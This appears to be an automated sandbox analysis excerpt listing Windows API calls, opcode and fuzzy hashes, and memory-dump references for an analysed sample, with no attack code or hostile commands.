                                                          • Opcode ID: b81912fe9410729738c8cc3b4427c31e6f6ea190abe7f97a6bc74282f8b5003d
                                                          • Instruction ID: 7f4ce0808efc90522886b7fd4f7afe0cb5ca5dcd319eb65f5abb6fc959a7204b
                                                          • Opcode Fuzzy Hash: b81912fe9410729738c8cc3b4427c31e6f6ea190abe7f97a6bc74282f8b5003d
                                                          • Instruction Fuzzy Hash: BDE012A93542005FE700FA7589C1F2B22DCDB44315F00846AF945CA183D678CC054B69
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocLock
                                                          • String ID:
                                                          • API String ID: 15508794-0
                                                          • Opcode ID: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                          • Instruction ID: 06179efae1cd4c7c45065c0f91b58358bdd8bb936cab03a6fa385f12497be06a
                                                          • Opcode Fuzzy Hash: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                          • Instruction Fuzzy Hash: 3E9002C4D10B00B8DC0072B20C1AD3F146CD8C172D3D0486F7004B61C3883C88004839
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocFree
                                                          • String ID:
                                                          • API String ID: 2087232378-0
                                                          • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                          • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                          • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                          • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                          APIs
                                                          • GetSystemDefaultLCID.KERNEL32(00000000,00408702), ref: 004085EB
                                                            • Part of subcall function 00406DDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406DF9
                                                            • Part of subcall function 00408558: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                                          • String ID:
                                                          • API String ID: 1658689577-0
                                                          • Opcode ID: e0f2d7fee364d4b50c904546fee583fee48e6df64a24fbccf64ec24177fbbbf9
                                                          • Instruction ID: bd6209dc85efa73f9a721b4ecfe58d49d0953a842630d38ee12c0cb785ae99e6
                                                          • Opcode Fuzzy Hash: e0f2d7fee364d4b50c904546fee583fee48e6df64a24fbccf64ec24177fbbbf9
                                                          • Instruction Fuzzy Hash: 1E314075E0011D9BCB01EF95C8819EEB779EF84314F518577E819BB386E738AE018B98
                                                          APIs
                                                          • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC31
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: InfoScroll
                                                          • String ID:
                                                          • API String ID: 629608716-0
                                                          • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                          • Instruction ID: d0a12eb0c5d8f31e5c98d8a2781f1eb62c39d12b06d2a108fd5dac4500059ce8
                                                          • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                          • Instruction Fuzzy Hash: C02130B16087466FC340DF39C5447A6BBE4BB88304F04893EA498C3741E778E996CBD6
                                                          APIs
                                                            • Part of subcall function 0041EE9C: GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                            • Part of subcall function 0041EE9C: 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                          • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C2CE,?,00000000,?,?,0046C4E0,?,00000000,0046C554), ref: 0046C2B2
                                                            • Part of subcall function 0041EF50: IsWindow.USER32(?), ref: 0041EF5E
                                                            • Part of subcall function 0041EF50: EnableWindow.USER32(?,00000001), ref: 0041EF6D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$A25940CurrentEnablePathPrepareThreadWrite
                                                          • String ID:
                                                          • API String ID: 390483697-0
                                                          • Opcode ID: 1950fa63623794e8b6cf7dfe712e88d918e2b7d9557fc3b7505cef75313acc34
                                                          • Instruction ID: 435c92a82c98609a262d66890dafa743f24e5c1e823ccadb8e8beb41f7667319
                                                          • Opcode Fuzzy Hash: 1950fa63623794e8b6cf7dfe712e88d918e2b7d9557fc3b7505cef75313acc34
                                                          • Instruction Fuzzy Hash: 95F059B1288300BFE7049BF2ECA6B2577E9E318720F510477F904821C0E5B95800C51E
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                          • Instruction ID: bbd698397dbc8f39e4f55c310c3945233451addb9156919cc96357002ab2f652
                                                          • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                          • Instruction Fuzzy Hash: 66F06271614109DBBB1CCF58D1519AF7BA0EB44310B20406FF907C7BA0E6346E90DA58
                                                          APIs
                                                          • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 0041657D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                          • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                          • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                          • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149E7
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                          • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                          • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                          • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004507D8
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: fdd558c29566e738fcbdedabbf129a38e9c66ac316c6ebf650c30ee427f19e4e
                                                          • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                          • Opcode Fuzzy Hash: fdd558c29566e738fcbdedabbf129a38e9c66ac316c6ebf650c30ee427f19e4e
                                                          • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                          APIs
                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD0C,?,00000001,?,?,00000000,?,0042CD5E,00000000,004529F9,00000000,00452A1A,?,00000000), ref: 0042CCEF
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 416bf2ec68b95bcc5af0582ff2491831708fe8216b24dbe794372527742e75b2
                                                          • Instruction ID: 6c88cd9b3502ecc0d8ec22600fa2d9d68314b02b8b7bc0d4dcd5a0b3e687a907
                                                          • Opcode Fuzzy Hash: 416bf2ec68b95bcc5af0582ff2491831708fe8216b24dbe794372527742e75b2
                                                          • Instruction Fuzzy Hash: 62E0E570300304BFDB01EB62AC82A5EBFECDB45704BA14876B400A7242D5785E008418
                                                          APIs
                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FormatMessage
                                                          • String ID:
                                                          • API String ID: 1306739567-0
                                                          • Opcode ID: e6d3d52e8f4f63ecf0b34621506695ba35df63bdde710507be70f7165fd629ff
                                                          • Instruction ID: 2ce6c9ff4e19e0960d9753b9113d8e2cc47385edbc752d5ed3014e636873cb34
                                                          • Opcode Fuzzy Hash: e6d3d52e8f4f63ecf0b34621506695ba35df63bdde710507be70f7165fd629ff
                                                          • Instruction Fuzzy Hash: 90E0D86178831116F23535566C43B77150E4380708F9840277B809E3D3D6AE9905A25E
                                                          APIs
                                                          • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF93
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ExtentPointText
                                                          • String ID:
                                                          • API String ID: 566491939-0
                                                          • Opcode ID: 3c55dac69961fee89b68075ba878e24778629f7632fcdab2122717d20327b8c8
                                                          • Instruction ID: 35d5fbc2abb1c5525ca41b455db2da1d0f195ed39a7f49d2ce332ec9d6dfc1ac
                                                          • Opcode Fuzzy Hash: 3c55dac69961fee89b68075ba878e24778629f7632fcdab2122717d20327b8c8
                                                          • Instruction Fuzzy Hash: EEE04FB53096102AD600A67E1DC19DB76DC8E483693148176B458E7292D628DE1242AE
                                                          APIs
                                                          • CreateWindowExA.USER32(00000000,00423674,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 00406311
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                          • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                          • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                          • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                          APIs
                                                          • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE08
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: a2fa4b3b70172a899a44371cb6cb166e106d6f14f5a748d009f698e06f133ef9
                                                          • Instruction ID: bece317731ff8cd2e666e34543c7a68b5f38d577bb060a1f695f350ce1c31ea4
                                                          • Opcode Fuzzy Hash: a2fa4b3b70172a899a44371cb6cb166e106d6f14f5a748d009f698e06f133ef9
                                                          • Instruction Fuzzy Hash: 46E07EB2610129AFDB40DE8CDC81EEB37ADAB1D350F404016FA08D7200C274EC519BB4
                                                          APIs
                                                          • FindClose.KERNEL32(00000000,000000FF,0047078C,00000000,00471588,?,00000000,004715D1,?,00000000,0047170A,?,00000000,?,00000000), ref: 00454BE2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseFind
                                                          • String ID:
                                                          • API String ID: 1863332320-0
                                                          • Opcode ID: 06d429211cbdde73cb23459f0bbdb60b04e95dac6161286f70ab338dbad9895d
                                                          • Instruction ID: 5b38ea55cb3c31d0920dcaeaf3b0ab9c64c5d1fc8265480bc1e0bc694521aac9
                                                          • Opcode Fuzzy Hash: 06d429211cbdde73cb23459f0bbdb60b04e95dac6161286f70ab338dbad9895d
                                                          • Instruction Fuzzy Hash: C3E092B0A056008BCB14DF3A898031A7AD29FC9324F04C56AEC9CCF3D7E63DC8594A27
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(00494EF2,?,00494F14,?,?,00000000,00494EF2,?,?), ref: 00414693
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                          • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                          • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                          • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                          APIs
                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F14
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                          • Instruction ID: cfde3e3822fa8edba560b3c3045b88a59d445a8db7eea6df610edd37a4bd72e7
                                                          • Opcode Fuzzy Hash: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                          • Instruction Fuzzy Hash: A3D012722081516AD220965AAC44EAB6BDCCBC5770F11063AB558C2181D7609C01C675
                                                          APIs
                                                            • Part of subcall function 004235F0: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 00423605
                                                          • ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                            • Part of subcall function 00423620: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 0042363C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: InfoParametersSystem$ShowWindow
                                                          • String ID:
                                                          • API String ID: 3202724764-0
                                                          • Opcode ID: fce0b26c2d9ed10aeec85bb6dc1e2ec36172a6d8969be9752991d6a22a5a0e05
                                                          • Instruction ID: ebc5fdb8686796c5fd5eba84b5ab6671b787b6de9fbea9510ee25edb69bb1d0b
                                                          • Opcode Fuzzy Hash: fce0b26c2d9ed10aeec85bb6dc1e2ec36172a6d8969be9752991d6a22a5a0e05
                                                          • Instruction Fuzzy Hash: 7CD05E123412703182307ABB384598B46AC8D922A6749043BB4448B347ED5DCE1110BC
                                                          APIs
                                                          • SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
